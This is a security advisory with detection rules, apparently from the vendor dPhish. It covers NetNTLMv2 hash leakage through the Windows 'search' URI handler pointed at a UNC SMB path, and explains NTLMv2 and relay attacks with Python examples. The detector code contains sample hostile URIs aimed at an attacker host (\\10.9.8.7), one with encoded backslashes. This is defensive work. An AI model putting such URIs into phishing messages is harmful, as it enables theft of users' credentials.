Overview
Huntress disclosed a vulnerability that leaks victims’ NetNTLMv2 hashes. A leaked hash can be used to log in as the user, either through a relay attack or by cracking the hash offline to recover the user’s password.
Summary
It was discovered that the “search” Windows URI handler, which allows applications to open the Windows Search window directly with a specific query, can be abused to point to a UNC path (e.g., \\10.9.8.7) hosting an SMB server.
An attacker could trick a victim into invoking the search handler, causing the victim’s device to connect to the attacker-controlled SMB server. That connection forces the device to start a NetNTLM authentication, so the NetNTLM hash is exposed and can subsequently be used in a NetNTLM relay attack or cracked to recover the victim’s password.
Background
This section explains Windows URI handlers, the NetNTLM protocol, and the relay attack. If you are already familiar with these concepts, you can skip it.
Windows URI Handlers
Windows uses a mechanism called URI handlers: URI prefixes such as http:, https:, search:, and search-ms:. Windows recognizes each prefix and associates it with the application or component responsible for processing it.
The mapping between a URI handler and its corresponding application is stored in the Windows Registry.
For example:
URI Handler: http
Registry Path:
HKEY_CLASSES_ROOT\http\shell\open\command
Registry Value:
DelegateExecute, which points to a CLSID (Class Identifier) referencing the COM object responsible for handling the execution of the URI.
When a user clicks an http:// link, Windows resolves the associated CLSID, invokes the corresponding COM component, and passes the URI to it for processing, ultimately launching the default web browser and opening the requested URL.

NetNTLMv2
NetNTLM is a Windows authentication protocol based on a challenge-response mechanism. When a user attempts to access a server, the server sends a challenge (typically 8 bytes of random data) to the client. The client then hashes this challenge with an HMAC-based cryptographic function (a keyed hash function) whose key is the user’s NTLM hash, itself derived from the user’s password, and sends the result back to the server.
The server performs the same calculation using the user’s stored hash and compares the computed value with the response received from the client. If the two values match, the session is authenticated.
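The NTLMv2 computation just described, as an added example in Python (not code from the original post, from Huntress or from dPhish): the client keys an HMAC-MD5 with a value derived from the NT hash and applies it to the server challenge plus a client blob, and the server repeats the same calculation with the hash it has stored. The NT hash, user name, domain and both challenges are constructed sample values, and the blob is a minimal one with an empty target-info list. Because the server’s check needs only the stored hash, the challenge and the response, anyone who has captured the exchange can run the identical check against candidate hashes, which is why a leaked response can be cracked offline.

```python
import hashlib
import hmac
import struct

# Constructed sample credential: the NT hash the server has stored for the user.
# A real NT hash is MD4(UTF-16LE(password)); it is treated as an opaque 16-byte key here.
STORED_NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
USER = "alice"      # constructed
DOMAIN = "CORP"     # constructed


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, encoded UTF-16LE."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def make_blob(client_challenge: bytes, timestamp: int = 0) -> bytes:
    """Minimal NTLMv2 client blob: version header, FILETIME, 8-byte client nonce,
    reserved words and an empty target-info list (real clients add AV pairs)."""
    assert len(client_challenge) == 8
    return (b"\x01\x01\x00\x00"             # RespType, HiRespType, reserved
            + b"\x00\x00\x00\x00"           # reserved
            + struct.pack("<Q", timestamp)  # FILETIME (constructed: 0)
            + client_challenge
            + b"\x00\x00\x00\x00"           # reserved
            + b"\x00\x00\x00\x00"           # target info (empty here)
            + b"\x00\x00\x00\x00")          # reserved


def client_response(nt_hash, user, domain, server_challenge, blob):
    """Client side: NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob);
    the response sent over the wire is NTProofStr || blob."""
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def server_verify(stored_nt_hash, user, domain, server_challenge, response):
    """Server side: split off the blob, recompute NTProofStr with the stored hash,
    and compare in constant time."""
    nt_proof, blob = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def demo():
    """One exchange with fixed (constructed) nonces.
    Returns (accepted with the right hash, accepted with a wrong hash)."""
    server_challenge = bytes.fromhex("1122334455667788")
    client_nonce = bytes.fromhex("8877665544332211")
    blob = make_blob(client_nonce)
    response = client_response(STORED_NT_HASH, USER, DOMAIN, server_challenge, blob)
    ok = server_verify(STORED_NT_HASH, USER, DOMAIN, server_challenge, response)
    wrong = server_verify(bytes(16), USER, DOMAIN, server_challenge, response)
    return ok, wrong


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The server challenge binds the response to one session, so a captured response cannot simply be replayed against the same server; that is why the relay attack described below forwards the target’s fresh challenge to the victim instead of reusing an old response.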
NetNTLMv2 Relay Attack
This attack relies on relaying the NetNTLMv2 challenge-response authentication process between a victim and a target server through an attacker-controlled system.
When the victim clicks a malicious link, the victim’s device initiates a NetNTLMv2 authentication request to the attacker’s server. Instead of completing it, the attacker forwards the authentication to another server they wish to access. The target server responds with a challenge, which the attacker relays back to the victim, and the man-in-the-middle exchange continues this way to the end of the protocol.
Vulnerability
The Windows URI handler “search” takes a query of the following form:
search:query=dPhishFiles&crumb=location:C:\Users\dPhish
It was discovered that the “location:” crumb can point to a UNC path.

The attacker can deliver this via a phishing email that directly contains a URL pointing to the search URI handler, or via a regular phishing page that contains the URI handler.
Detection
Detection should be performed on:
1. Emails containing a URL that contains “search”, “crumb”, and “\\”
2. URLs containing an anchor tag that points to “search”, “crumb”, and “\\”
Discover Rules
id: "1aeecf9a-edae-49ac-b824-1f2e3351d9af"
name: "Search Windows URI Handler: NetNTLM Hash Leakage"
description: "Detects email that contains URL points to search URI Handlers."
rule_engine: "Atomic"
category: "URL"
version: 1
score: 70
confidence: 100
severity: "High"
detection:
  all:
    - urls.url: {icontains: "search"}
    - urls.url: {icontains: "crumb"}
    - urls.url: {icontains: "\\"}
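The detection logic above, as an added Python example (not the post’s own code and not dPhish’s rule engine): it extracts search: URIs from email text or HTML, parses the crumb=location: value, percent-decodes it and flags UNC paths, reporting the host that would receive the SMB connection. search-ms: is included on the assumption that it accepts the same crumb parameters; rule_matches is a literal translation of the three icontains conditions. The sample messages are constructed; the first reuses the post’s own local-path query.

```python
import re
from urllib.parse import unquote

# search: URIs in free text or href attributes. search-ms: is added on the
# assumption that it takes the same crumb= parameters. The URI ends at
# whitespace, a quote or an angle bracket.
URI_RE = re.compile(r'\b(search(?:-ms)?):([^\s"\'<>]+)', re.IGNORECASE)
# A UNC path: two backslashes followed by a host name or address.
UNC_RE = re.compile(r"^\\\\([^\\]+)")


def parse_search_uri(uri: str):
    """Split 'search:k=v&k=v' into (scheme, {k: v}) with percent-encoding removed."""
    scheme, _, rest = uri.partition(":")
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)
    return scheme.lower(), params


def rule_matches(text: str) -> bool:
    """Literal translation of the Atomic rule: the URL must contain 'search', 'crumb'
    and the UNC prefix (two backslashes), all case-insensitive. Decoding first means
    %5C%5C-encoded backslashes do not slip past the substring check."""
    u = unquote(text).lower()
    return "search" in u and "crumb" in u and "\\\\" in u


def analyze(text: str):
    """Find every search URI in text and report whether its location crumb is a UNC path."""
    findings = []
    for m in URI_RE.finditer(text):
        uri = m.group(0)
        scheme, params = parse_search_uri(uri)
        crumb = params.get("crumb", "")
        location = crumb[len("location:"):] if crumb.lower().startswith("location:") else ""
        unc = UNC_RE.match(location)
        findings.append({
            "uri": uri,
            "scheme": scheme,
            "location": location,
            "unc": unc is not None,
            "host": unc.group(1) if unc else None,  # host that would receive the SMB connection
            "rule": rule_matches(uri),
        })
    return findings


def flagged(texts):
    """Findings across several messages whose location crumb points at a UNC host."""
    return [f for t in texts for f in analyze(t) if f["unc"]]


# Constructed sample messages (not real traffic). The first is the post's benign
# local-path query; the second and third point the crumb at a UNC host, the
# third with percent-encoded backslashes; the fourth contains no handler at all.
SAMPLES = [
    r"Please review: search:query=dPhishFiles&crumb=location:C:\Users\dPhish",
    r'<a href="search:query=dPhishFiles&crumb=location:\\10.9.8.7\share">Open files</a>',
    "Invoice attached search:query=invoice&crumb=location:%5C%5C10.9.8.7%5Cfiles",
    "No handler here: https://example.com/search?crumb=1",
]

if __name__ == "__main__":
    for f in flagged(SAMPLES):
        print(f["host"], f["uri"])
```

Run the substring rule on the percent-decoded URL as well as the raw one: the third sample carries no literal backslash, so a raw-only check would miss it, while the decoded location still resolves to a UNC host. Parsing the crumb also separates the benign local path in the first sample from the UNC cases, which a pure substring rule cannot do on its own.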
dPhish Discover Cloud customers are automatically protected, as detection rules are distributed across all tenant environments.
For on-premises deployments, including air-gapped environments, customers can obtain the latest detection rules through their assigned Technical Account Manager (TAM).